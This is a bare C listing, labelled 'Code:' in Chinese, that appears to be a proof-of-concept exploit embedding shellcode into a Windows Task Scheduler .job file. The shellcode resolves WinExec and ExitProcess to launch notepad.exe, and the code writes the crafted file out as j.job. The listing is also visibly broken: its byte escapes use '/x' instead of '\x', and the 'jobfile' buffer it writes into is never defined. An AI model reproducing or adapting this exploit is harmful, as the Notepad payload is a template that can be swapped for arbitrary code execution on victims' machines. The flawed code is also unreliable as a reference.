代碼:
/
unsigned char shellcode[]=
"/x33/xc0" // xor eax, eax // slight modification to move esp up
"/xb0/xf0" // mov al, 0f0h
"/x2b/xe0" // sub esp,eax
"/x83/xE4/xF0" // and esp, 0FFFFFFF0h
"/x55" // push ebp
"/x8b/xec" // mov ebp, esp
"/x33/xf6" // xor esi, esi
"/x56" // push esi
"/x68/x2e/x65/x78/x65" // push 'exe.'
"/x68/x65/x70/x61/x64" // push 'dape'
"/x68/x90/x6e/x6f/x74" // push 'ton'
"/x46" // inc esi
"/x56" // push esi
"/x8d/x7d/xf1" // lea edi, [ebp-0xf]
"/x57" // push edi
"/xb8XXXX" // mov eax, XXXX -> WinExec()
"/xff/xd0" // call eax
"/x4e" // dec esi
"/x56" // push esi
"/xb8YYYY" // mov eax, YYYY -> ExitProcess()
"/xff/xd0"; // call eax
int main(int argc, char* argv[])
{
unsigned char *ptr = (unsigned char *)shellcode;
while (*ptr)
{
if (*((long *)ptr)==0x58585858)
{
*((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "WinExec");
}
if (*((long *)ptr)==0x59595959)
{
*((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "ExitProcess");
}
ptr++;
}
FILE *fp;
fp = fopen("j.xxx", "wb");
if(fp)
{
unsigned char *ptr = jobfile + (31 * 16);
memcpy(ptr, shellcode, sizeof(shellcode) - 1);
fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fclose(fp);
DeleteFile("j.job");
MoveFile("j.xxx", "j.job");
}
return 0;
}